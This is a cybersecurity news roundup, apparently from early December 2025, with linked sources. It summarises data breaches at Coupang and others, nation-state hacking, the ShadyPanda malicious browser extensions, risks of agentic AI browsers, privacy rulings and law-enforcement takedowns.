Alright cyber pros, it's been a pretty packed 24 hours! We've got major data breaches impacting millions, new insights into nation-state tactics, a huge takedown of a crypto mixer, and a stark warning about the security implications of agentic AI browsers. Let's dive in:
Major Data Breaches Unfold ⚠️
- South Korean e-commerce giant Coupang, often dubbed the "Amazon of Korea," confirmed a data breach impacting 33.7 million customers, over half the country's population. Exposed data includes names, emails, phone numbers, addresses, and order history, with local reports suggesting a former Chinese employee used unrevoked access tokens.
- The French Football Federation (FFF) also reported a breach of its member management software via a compromised account, exposing personal details like names, gender, DOB, nationality, and contact info for an undisclosed number of its 2.2 million members.
- The popular open-source SmartTube YouTube client for Android TV was compromised after an attacker gained access to the developer's signing keys, pushing a malicious update that included a hidden library for device fingerprinting and remote configuration. Users are urged to revert to older, safe builds and reset Google account passwords.
🗞️ The Record | https://therecord.media/coupang-south-korea-data-breach
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/coupang_breach/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/retail-giant-coupang-suffers-data-breach-impacting-337-million-people/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/french_football_federation_breach/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/smarttube-youtube-app-for-android-tv-breached-to-push-malicious-update/
Nation-State Actors Evolve Tactics 🕵🏼
- North Korea's Lazarus Group is accused by South Korean officials of stealing $30 million from the Upbit cryptocurrency exchange, using tactics similar to a 2019 attack. The group allegedly impersonated administrators to transfer funds, prompting Upbit to suspend services and move assets to cold storage.
- The Tomiris APT, linked to Kazakhstan-based Storm-0473, is increasingly leveraging public services like Telegram and Discord for command-and-control (C2) in attacks targeting government entities and foreign ministries across Central Asia and Russia. This shift aims to blend malicious traffic with legitimate activity, making detection harder.
- Leaked documents, analysed by Iranian opposition activist Nariman Gharib, allegedly link Iran's "Charming Kitten" (APT35) to assassination operations, suggesting compromised airline, hotel, and medical databases are used to locate regime enemies.
🗞️ The Record | https://therecord.media/officials-accuse-north-korea-hackers-of-attack-on-crypto-exchange
📰 The Hacker News | https://thehackernews.com/2025/12/tomiris-shifts-to-public-service.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/infosec_news_in_brief/
Malicious Browser Extensions Run Rampant 🛡️
- A seven-year-long "ShadyPanda" campaign infected over 4.3 million Chrome and Edge users through 145 seemingly legitimate browser extensions that later pushed malware-laden updates. These extensions evolved from affiliate fraud and search hijacking to deploying remote code execution (RCE) backdoors and spyware.
- The RCE backdoor checks for new instructions hourly, executing arbitrary JavaScript with full browser API access, while spyware components exfiltrate extensive user data including browsing history, keystrokes, and sensitive identifiers to Chinese servers.
- Despite Google removing some, several extensions with millions of installs remain active on the Microsoft Edge Add-ons platform, highlighting a critical gap in ongoing marketplace security reviews post-approval.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/shadypanda-browser-extensions-amass-43m-installs-in-malicious-campaign/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/chrome_edge_malicious_browser_extensions/
AI Browsers: A New Security Nightmare 🧠
- The emergence of "agentic" AI browsers, like OpenAI's ChatGPT Atlas, is transforming browsers from passive tools into autonomous AI agents that can perform actions on behalf of users.
- These agents require maximum privileges, including access to session cookies, credentials, and payment details, creating an unprecedented attack surface and bypassing traditional "human-in-the-loop" safeguards and MFA.
- Prompt injection is a significant risk, where hidden text can command the AI to exfiltrate data, and traditional security tools often miss these threats due to a "session gap" where actions occur locally within the browser.
📰 The Hacker News | https://thehackernews.com/2025/12/webinar-agentic-trojan-horse-why-new-ai.html
Data Privacy Under Scrutiny 🔒
- Switzerland's data protection officers (Privatim) have advised public bodies to avoid hyperscale clouds and SaaS, specifically Microsoft 365, for sensitive data due to a lack of true end-to-end encryption, exposure to the US CLOUD Act, and providers' ability to unilaterally change terms.
- Exercise-tracking app Strava is updating its terms of service to require users to accept all risks associated with geolocation features, following past incidents where user data revealed sensitive locations like military bases.
- Edtech provider Illuminate Education settled with the FTC over a 2021 data breach affecting 10.1 million students, with allegations of poor security practices, deceptive claims, and delayed breach notifications (up to two years for some).
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/infosec_news_in_brief/
🗞️ The Record | https://therecord.media/illuminate-education-data-breach-settlement-ftc
Regulatory Actions and Government Directives 📜
- Singapore's Ministry of Home Affairs has issued directives to Google and Apple, requiring them to prevent fake government messages and spoofed sender names on iMessage and Google Messages, with significant fines for non-compliance.
- Russia's Roskomnadzor has imposed "restrictive measures" on WhatsApp, citing violations of Russian law and its alleged use for terrorism, crime, and espionage, urging users to switch to domestic alternatives and threatening a full block.
- The Israel Defense Forces (IDF) is reportedly banning Android smartphones for top brass, standardising on iOS devices to reduce exposure to surveillance via social media apps.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/asia_tech_news_roundup/
🗞️ The Record | https://therecord.media/russia-whatsapp-restrictions
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/infosec_news_in_brief/
Law Enforcement Strikes Back 🚨
- A major cryptocurrency mixing service, Cryptomixer, was taken down by Swiss and German law enforcement in "Operation Olympia," seizing three servers, its domain, and €24-29 million in Bitcoin. The service allegedly laundered over €1.3 billion for cybercriminals since 2016.
- South Korean police arrested four individuals for compromising over 120,000 IP cameras, with some suspects creating and selling sexually exploitative videos from intimate locations by exploiting weak passwords.
- In Australia, a man was jailed for over seven years for using "evil twin" Wi-Fi traps at airports and on flights to steal credentials and intimate material, while in the UK, a man received a 6.5-year sentence for operating a dark web drug empire.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/police-takes-down-cryptomixer-cryptocurrency-mixing-service/
🗞️ The Record | https://therecord.media/cryptomixer-service-takedown-bitcoin-seized
🤫 CyberScoop | https://cyberscoop.com/cryptomixer-takedown-seizure-europol/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/cybercrime_arrests_roundup/
Developer Secrets Exposed 🔑
- A security engineer scanned 5.6 million public GitLab repositories and discovered 17,000 verified live secrets, including over 5,000 Google Cloud credentials, 2,000+ MongoDB credentials, and numerous OpenAI, AWS, and Telegram bot tokens.
- The scan, costing about $770 and completed in 24 hours, found GitLab had a 35% higher density of leaked secrets per repository compared to Bitbucket, highlighting a pervasive issue of exposed credentials in public code.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/infosec_news_in_brief/
Teen Cybercrime: Just a Phase? 📊
- A Dutch government report suggests that most adolescent cybercriminals tend to desist from offending by the age of 20, similar to other types of youth crime.
- The study indicates that only about four percent of those who start a "black hat" career maintain it into adulthood, often driven by technological curiosity and skill-building rather than financial gain.
- The report highlights the challenge of quantifying the specific social cost of cybercrime due to a lack of longitudinal data and its rapidly evolving nature, though overall adolescent crime costs the Netherlands €10.3 billion annually.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/dutch_study_teen_cybercrime/
#CyberSecurity #ThreatIntelligence #DataBreach #APT #LazarusGroup #Tomiris #ShadyPanda #Malware #BrowserExtensions #RCE #AI #AgenticAI #DataPrivacy #RegulatoryCompliance #LawEnforcement #CryptoMixer #Cybercrime #InfoSec #IncidentResponse
PrivacyDigest
N-gated Hacker News
Aktion Freiheit statt Angst
Prof. Dr. Dennis-Kenji Kipker
Hackread.com
Arlin Schaffel
WinFuture.de
SOC Goulash
The Threat Codex